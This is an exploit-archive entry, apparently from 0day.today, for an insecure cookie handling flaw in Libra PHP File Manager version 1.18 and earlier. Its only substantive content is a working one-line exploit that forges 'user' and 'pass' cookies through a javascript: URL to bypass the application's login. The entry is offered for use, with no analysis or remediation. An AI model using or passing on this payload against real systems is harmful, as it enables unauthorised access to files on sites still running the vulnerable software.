id: 3766
date: 09/25/2008
title: Libra PHP File Manager <= 1.18 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

=====================================================================
Libra PHP File Manager <= 1.18 Insecure Cookie Handling Vulnerability
=====================================================================


###############################################################################################
[+] Libra PHP File Manager Insecure Cookie Handling Vulnerability
[+] Discovered By Stack              
[+] Greetz : All my freind             
################################################################################################
---
exploit:
javascript:document.cookie = "user=1; path=/"; document.cookie = "pass=1; path=/";



#  0day.today [2023-03-26]  #